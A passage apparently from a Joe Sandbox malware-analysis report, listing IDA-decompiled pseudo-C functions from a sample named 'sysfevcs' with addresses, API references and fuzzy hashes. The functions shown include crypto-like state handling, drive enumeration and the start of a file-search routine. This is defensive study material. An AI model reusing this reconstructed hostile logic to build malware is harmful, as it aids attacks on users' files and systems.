                                                                                                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                                                                                                  			E00407AF0(intOrPtr _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _t90;
                                                                                                                                                                                                                                                                  				intOrPtr _t109;
                                                                                                                                                                                                                                                                  				intOrPtr _t110;
                                                                                                                                                                                                                                                                  				signed int _t120;
                                                                                                                                                                                                                                                                  				intOrPtr _t137;
                                                                                                                                                                                                                                                                  				signed int _t138;
                                                                                                                                                                                                                                                                  				intOrPtr _t143;
                                                                                                                                                                                                                                                                  				void* _t144;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(_a8 != 0) {
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_a8 + 0x10c)) != 0) {
                                                                                                                                                                                                                                                                  						if(_a12 >= 0) {
                                                                                                                                                                                                                                                                  							if(_a12 < 0x1c) {
                                                                                                                                                                                                                                                                  								_t109 = _a8;
                                                                                                                                                                                                                                                                  								asm("adc eax, 0x0");
                                                                                                                                                                                                                                                                  								_t110 = _a8;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t110 + 0x118)) =  *((intOrPtr*)(_t109 + 0x118)) + 1;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t110 + 0x11c)) =  *((intOrPtr*)(_t109 + 0x11c));
                                                                                                                                                                                                                                                                  								if(_a12 == 1) {
                                                                                                                                                                                                                                                                  									if(_a12 >=  *((intOrPtr*)(_a8 + 0x16c)) + 1) {
                                                                                                                                                                                                                                                                  										_t23 = (_a12 << 9) + 0x1f8; // 0x1f8
                                                                                                                                                                                                                                                                  										E00407760(_a12 << 9, _a8 + _t23, 0x30);
                                                                                                                                                                                                                                                                  										_t144 = _t144 + 8;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										_t19 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                  										E00407760(_a12 << 9, _a8 + _t19, 0x40);
                                                                                                                                                                                                                                                                  										_t144 = _t144 + 8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v8 = 0x1000 -  *(_a8 + 0x3b78 + _a12 * 4);
                                                                                                                                                                                                                                                                  								_t33 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                  								_t90 = E00407450(_a4, 0x4100a8, _a8 + 0x128, _a12,  *((intOrPtr*)(_a8 + 0x3bf0 + _a12 * 8)),  *((intOrPtr*)(_a8 + 0x170)),  *((intOrPtr*)(_a8 + 0x16c)), _a16, _v8,  *((intOrPtr*)(_a8 + 0x168)),  *_a8, _a8 + _t33); // executed
                                                                                                                                                                                                                                                                  								_v12 = _t90;
                                                                                                                                                                                                                                                                  								if(_v12 == 0) {
                                                                                                                                                                                                                                                                  									 *(_a8 + 0x3b78 + _a12 * 4) = 0;
                                                                                                                                                                                                                                                                  									_t120 = _a12;
                                                                                                                                                                                                                                                                  									_t137 = _a8;
                                                                                                                                                                                                                                                                  									asm("adc ecx, 0x0");
                                                                                                                                                                                                                                                                  									_t138 = _a12;
                                                                                                                                                                                                                                                                  									_t143 = _a8;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t143 + 0x3bf0 + _t138 * 8)) =  *((intOrPtr*)(_t137 + 0x3bf0 + _t120 * 8)) + 1;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t143 + 0x3bf4 + _t138 * 8)) =  *((intOrPtr*)(_t137 + 0x3bf4 + _t120 * 8));
                                                                                                                                                                                                                                                                  									_t78 = (_a12 << 9) + 0x178; // 0x178
                                                                                                                                                                                                                                                                  									memset(_a8 + _t78, 0, 0x200);
                                                                                                                                                                                                                                                                  									return 0;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									return _v12;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							return 7;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return 6;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return 5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 3;
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x00407afb
                                                                                                                                                                                                                                                                  0x00407b11
                                                                                                                                                                                                                                                                  0x00407b21
                                                                                                                                                                                                                                                                  0x00407b31
                                                                                                                                                                                                                                                                  0x00407b3d
                                                                                                                                                                                                                                                                  0x00407b4f
                                                                                                                                                                                                                                                                  0x00407b52
                                                                                                                                                                                                                                                                  0x00407b55
                                                                                                                                                                                                                                                                  0x00407b5b
                                                                                                                                                                                                                                                                  0x00407b65
                                                                                                                                                                                                                                                                  0x00407b76
                                                                                                                                                                                                                                                                  0x00407ba0
                                                                                                                                                                                                                                                                  0x00407ba8
                                                                                                                                                                                                                                                                  0x00407bad
                                                                                                                                                                                                                                                                  0x00407b78
                                                                                                                                                                                                                                                                  0x00407b83
                                                                                                                                                                                                                                                                  0x00407b8b
                                                                                                                                                                                                                                                                  0x00407b90
                                                                                                                                                                                                                                                                  0x00407b90
                                                                                                                                                                                                                                                                  0x00407b76
                                                                                                                                                                                                                                                                  0x00407bc2
                                                                                                                                                                                                                                                                  0x00407bce
                                                                                                                                                                                                                                                                  0x00407c26
                                                                                                                                                                                                                                                                  0x00407c2e
                                                                                                                                                                                                                                                                  0x00407c35
                                                                                                                                                                                                                                                                  0x00407c42
                                                                                                                                                                                                                                                                  0x00407c4d
                                                                                                                                                                                                                                                                  0x00407c50
                                                                                                                                                                                                                                                                  0x00407c64
                                                                                                                                                                                                                                                                  0x00407c67
                                                                                                                                                                                                                                                                  0x00407c6a
                                                                                                                                                                                                                                                                  0x00407c6d
                                                                                                                                                                                                                                                                  0x00407c74
                                                                                                                                                                                                                                                                  0x00407c8b
                                                                                                                                                                                                                                                                  0x00407c93
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00407c37
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00407c37
                                                                                                                                                                                                                                                                  0x00407c35
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00407b33
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00407b23
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00407b13
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 39655b6e32a0fddd19ae20ffbcdeee75a63a8892fc518363649473cd71419ee2
                                                                                                                                                                                                                                                                  • Instruction ID: 651c5aac2539c6824e7a7f6c1f0ca58ac54da54bde40a03bda332443efcca585
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39655b6e32a0fddd19ae20ffbcdeee75a63a8892fc518363649473cd71419ee2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC514974604209DBDB04DF18C894FEA73B5FB48318F20816AE9299B382D735FA52CB85
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409C80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                                                                                                                  				signed int* _v8;
                                                                                                                                                                                                                                                                  				signed int* _v12;
                                                                                                                                                                                                                                                                  				signed int _t30;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  				void* _t34;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  				signed int _t39;
                                                                                                                                                                                                                                                                  				void* _t41;
                                                                                                                                                                                                                                                                  				void* _t42;
                                                                                                                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t46;
                                                                                                                                                                                                                                                                  				void* _t47;
                                                                                                                                                                                                                                                                  				void* _t48;
                                                                                                                                                                                                                                                                  				void* _t50;
                                                                                                                                                                                                                                                                  				void* _t53;
                                                                                                                                                                                                                                                                  				intOrPtr _t58;
                                                                                                                                                                                                                                                                  				signed int _t63;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  				void* _t67;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				void* _t75;
                                                                                                                                                                                                                                                                  				void* _t76;
                                                                                                                                                                                                                                                                  				void* _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				void* _t79;
                                                                                                                                                                                                                                                                  				intOrPtr _t86;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t30 =  *0x4141ec; // 0x1
                                                                                                                                                                                                                                                                  				if((_t30 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                  					_t63 =  *0x4141ec; // 0x1
                                                                                                                                                                                                                                                                  					 *0x4141ec = _t63 | 0x00000001;
                                                                                                                                                                                                                                                                  					_t47 = E00408820(0xffffe4); // executed
                                                                                                                                                                                                                                                                  					_t78 = _t78 + 4;
                                                                                                                                                                                                                                                                  					 *0x4141e8 = _t47;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t65 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				memset(_t65, 0, 0xffffe4);
                                                                                                                                                                                                                                                                  				_t79 = _t78 + 0xc;
                                                                                                                                                                                                                                                                  				_t33 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t33 + 0xc)) = 1;
                                                                                                                                                                                                                                                                  				_t48 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t48 + 0x10)) = _a12;
                                                                                                                                                                                                                                                                  				_t34 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t34 + 8)) = _a16;
                                                                                                                                                                                                                                                                  				_t67 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t67 + 0x18)) = _a20;
                                                                                                                                                                                                                                                                  				_t50 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				 *((intOrPtr*)(_t50 + 0x14)) = 0xc;
                                                                                                                                                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                                                                                                                                                  					_t69 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  					_v8 = _t69 + 0x20;
                                                                                                                                                                                                                                                                  					if(_a24 == 0) {
                                                                                                                                                                                                                                                                  						_t42 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  						_t44 = E00409540(_a8, _t42 + 0x20);
                                                                                                                                                                                                                                                                  						_t79 = _t79 + 8;
                                                                                                                                                                                                                                                                  						_t76 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t76 + 0x1c)) = _t44;
                                                                                                                                                                                                                                                                  						_t45 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  						_t77 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  						_t46 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t46 + 0x14)) =  *(_t45 + 0x1c) * 0xc +  *((intOrPtr*)(_t77 + 0x14));
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t53 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  					_v8 =  *(_t53 + 0x1c) * 0xc + _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v8;
                                                                                                                                                                                                                                                                  					_t39 = E00404450( &(_v12[1]), 0xffff);
                                                                                                                                                                                                                                                                  					_t79 = _t79 + 8;
                                                                                                                                                                                                                                                                  					 *_v12 = _t39;
                                                                                                                                                                                                                                                                  					_t75 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  					_t58 = ( *_v12 << 8) +  *((intOrPtr*)(_t75 + 0x14));
                                                                                                                                                                                                                                                                  					_t86 = _t58;
                                                                                                                                                                                                                                                                  					_t41 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t41 + 0x14)) = _t58;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t36 =  *0x4141e8; // 0x4717028
                                                                                                                                                                                                                                                                  				_t37 = E00409BE0(_a4, _t86, _a4, _t36, _a28, _a32); // executed
                                                                                                                                                                                                                                                                  				return _t37;
                                                                                                                                                                                                                                                                  			}































                                                                                                                                                                                                                                                                  0x00409c86
                                                                                                                                                                                                                                                                  0x00409c8e
                                                                                                                                                                                                                                                                  0x00409c90
                                                                                                                                                                                                                                                                  0x00409c99
                                                                                                                                                                                                                                                                  0x00409ca4
                                                                                                                                                                                                                                                                  0x00409ca9
                                                                                                                                                                                                                                                                  0x00409cac
                                                                                                                                                                                                                                                                  0x00409cac
                                                                                                                                                                                                                                                                  0x00409cb8
                                                                                                                                                                                                                                                                  0x00409cbf
                                                                                                                                                                                                                                                                  0x00409cc4
                                                                                                                                                                                                                                                                  0x00409cc7
                                                                                                                                                                                                                                                                  0x00409ccc
                                                                                                                                                                                                                                                                  0x00409cd3
                                                                                                                                                                                                                                                                  0x00409cdc
                                                                                                                                                                                                                                                                  0x00409cdf
                                                                                                                                                                                                                                                                  0x00409ce7
                                                                                                                                                                                                                                                                  0x00409cea
                                                                                                                                                                                                                                                                  0x00409cf3
                                                                                                                                                                                                                                                                  0x00409cf6
                                                                                                                                                                                                                                                                  0x00409cfc
                                                                                                                                                                                                                                                                  0x00409d07
                                                                                                                                                                                                                                                                  0x00409d0d
                                                                                                                                                                                                                                                                  0x00409d16
                                                                                                                                                                                                                                                                  0x00409d1d
                                                                                                                                                                                                                                                                  0x00409d1f
                                                                                                                                                                                                                                                                  0x00409d2c
                                                                                                                                                                                                                                                                  0x00409d31
                                                                                                                                                                                                                                                                  0x00409d34
                                                                                                                                                                                                                                                                  0x00409d3a
                                                                                                                                                                                                                                                                  0x00409d3d
                                                                                                                                                                                                                                                                  0x00409d48
                                                                                                                                                                                                                                                                  0x00409d51
                                                                                                                                                                                                                                                                  0x00409d56
                                                                                                                                                                                                                                                                  0x00409d56
                                                                                                                                                                                                                                                                  0x00409d59
                                                                                                                                                                                                                                                                  0x00409d68
                                                                                                                                                                                                                                                                  0x00409d6e
                                                                                                                                                                                                                                                                  0x00409d7d
                                                                                                                                                                                                                                                                  0x00409d82
                                                                                                                                                                                                                                                                  0x00409d88
                                                                                                                                                                                                                                                                  0x00409d92
                                                                                                                                                                                                                                                                  0x00409d98
                                                                                                                                                                                                                                                                  0x00409d98
                                                                                                                                                                                                                                                                  0x00409d9b
                                                                                                                                                                                                                                                                  0x00409da0
                                                                                                                                                                                                                                                                  0x00409da0
                                                                                                                                                                                                                                                                  0x00409dab
                                                                                                                                                                                                                                                                  0x00409db5
                                                                                                                                                                                                                                                                  0x00409dc0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                  • Opcode ID: ebfcfd3096a58b80ecf56c17583028864db257f7c71a8142f2f75fde7e2f3659
                                                                                                                                                                                                                                                                  • Instruction ID: e70c928bb4ddc6c605aa1daa10ec18014934e226adf3ca4743589dd16f1c8271
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebfcfd3096a58b80ecf56c17583028864db257f7c71a8142f2f75fde7e2f3659
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E413CBCB00204AFC709CF44E895AA577B5FB98314B11816AED056B391DB34EBC1CB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                                                                                  			E00408340(void* _a4, void* _a8) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _t36;
                                                                                                                                                                                                                                                                  				void* _t68;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				void* _t71;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_a4 + 0x10c)) != 0) {
                                                                                                                                                                                                                                                                  						if( *(_a4 + 0x120) != 1) {
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_a4 + 0x174)) != 1) {
                                                                                                                                                                                                                                                                  								_v8 = 1;
                                                                                                                                                                                                                                                                  								while(_v8 <=  *((intOrPtr*)(_a4 + 0x174))) {
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)(_a4 + 0x3b78 + _v8 * 4)) <= 0) {
                                                                                                                                                                                                                                                                  										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                  										continue;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L14:
                                                                                                                                                                                                                                                                  								_t36 = E00407CB0(_a4, _v8, 1); // executed
                                                                                                                                                                                                                                                                  								_t69 = _t68 + 0xc;
                                                                                                                                                                                                                                                                  								_v12 = _t36;
                                                                                                                                                                                                                                                                  								if(_v12 == 0) {
                                                                                                                                                                                                                                                                  									E00407760(_a4 + 8, _a4 + 8, 0x10);
                                                                                                                                                                                                                                                                  									_t66 = _a4;
                                                                                                                                                                                                                                                                  									E00408230(_a4, _a4);
                                                                                                                                                                                                                                                                  									_t71 = _t69 + 0xc;
                                                                                                                                                                                                                                                                  									if(_a8 != 0) {
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										_t66 = _a8;
                                                                                                                                                                                                                                                                  										memcpy(_a8, _a4 + 8,  *_a4 + 7 + (_a8 & 0x00000007) >> 3);
                                                                                                                                                                                                                                                                  										_t71 = _t71 + 0xc;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00408180(_t66, _a4);
                                                                                                                                                                                                                                                                  									 *(_a4 + 0x120) = 1;
                                                                                                                                                                                                                                                                  									return 0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								return _v12;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  							goto L14;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return 5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 3;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040834a
                                                                                                                                                                                                                                                                  0x00408360
                                                                                                                                                                                                                                                                  0x00408376
                                                                                                                                                                                                                                                                  0x00408389
                                                                                                                                                                                                                                                                  0x00408394
                                                                                                                                                                                                                                                                  0x004083a6
                                                                                                                                                                                                                                                                  0x004083c2
                                                                                                                                                                                                                                                                  0x004083a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004083a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004083c4
                                                                                                                                                                                                                                                                  0x004083c8
                                                                                                                                                                                                                                                                  0x004083d2
                                                                                                                                                                                                                                                                  0x004083d7
                                                                                                                                                                                                                                                                  0x004083da
                                                                                                                                                                                                                                                                  0x004083e1
                                                                                                                                                                                                                                                                  0x004083f1
                                                                                                                                                                                                                                                                  0x004083f9
                                                                                                                                                                                                                                                                  0x004083fd
                                                                                                                                                                                                                                                                  0x00408402
                                                                                                                                                                                                                                                                  0x00408409
                                                                                                                                                                                                                                                                  0x00408413
                                                                                                                                                                                                                                                                  0x00408424
                                                                                                                                                                                                                                                                  0x00408428
                                                                                                                                                                                                                                                                  0x0040842d
                                                                                                                                                                                                                                                                  0x0040842d
                                                                                                                                                                                                                                                                  0x00408434
                                                                                                                                                                                                                                                                  0x0040843f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408449
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004083e3
                                                                                                                                                                                                                                                                  0x0040838b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040838b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408378
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00408362
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1cfca92cc278b72f3db2bccf06ad551f1d0790b15a22623cba8a527b9161c03f
                                                                                                                                                                                                                                                                  • Instruction ID: f3f0689c6237e335b1b3cf9b347ec5cc79fbb29806fe83d2227e2155049f366b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cfca92cc278b72f3db2bccf06ad551f1d0790b15a22623cba8a527b9161c03f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80317270904108EBCB00CF54CA45B9D37B1EB94308F14817EE8496B381DB3AEA95DB8A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404980(signed int _a4, signed int _a8, WCHAR* _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				short _v12;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				if((0x00000001 << _a8 & _a4) != 0) {
                                                                                                                                                                                                                                                                  					_v16 = _a8 + 0x41;
                                                                                                                                                                                                                                                                  					_v14 = 0x3a;
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					_t19 = E00404900( &_v16); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t19;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						lstrcpyW(_a12,  &_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x00404986
                                                                                                                                                                                                                                                                  0x0040499a
                                                                                                                                                                                                                                                                  0x004049a3
                                                                                                                                                                                                                                                                  0x004049ac
                                                                                                                                                                                                                                                                  0x004049b2
                                                                                                                                                                                                                                                                  0x004049ba
                                                                                                                                                                                                                                                                  0x004049c2
                                                                                                                                                                                                                                                                  0x004049c9
                                                                                                                                                                                                                                                                  0x004049d3
                                                                                                                                                                                                                                                                  0x004049d3
                                                                                                                                                                                                                                                                  0x004049c9
                                                                                                                                                                                                                                                                  0x004049df

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00404900: GetDriveTypeW.KERNEL32(004049BF), ref: 0040490D
                                                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32 ref: 004049D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DriveTypelstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3664088370-0
                                                                                                                                                                                                                                                                  • Opcode ID: f0761cd65cc167bf028e17c3dfecc5f31f6110751945d9876674e74be9e33526
                                                                                                                                                                                                                                                                  • Instruction ID: 20f71b4ba4efcf093992c15eb62222677fc5d6185dab2aec86fad14765095d1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0761cd65cc167bf028e17c3dfecc5f31f6110751945d9876674e74be9e33526
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F06DF190020CFBCB00DFA4D44579EB7B4EF44304F00C0BAE919AB241E239AB18CB49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404CF0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				short _v1564;
                                                                                                                                                                                                                                                                  				short _v2084;
                                                                                                                                                                                                                                                                  				intOrPtr _v2088;
                                                                                                                                                                                                                                                                  				short _v2612;
                                                                                                                                                                                                                                                                  				short _v3132;
                                                                                                                                                                                                                                                                  				char _v3133;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                  				short _v4252;
                                                                                                                                                                                                                                                                  				void* _v4256;
                                                                                                                                                                                                                                                                  				short _v4780;
                                                                                                                                                                                                                                                                  				intOrPtr _v4784;
                                                                                                                                                                                                                                                                  				WCHAR* _v4788;
                                                                                                                                                                                                                                                                  				WCHAR* _v4792;
                                                                                                                                                                                                                                                                  				WCHAR* _v4796;
                                                                                                                                                                                                                                                                  				WCHAR* _v4800;
                                                                                                                                                                                                                                                                  				WCHAR* _v4804;
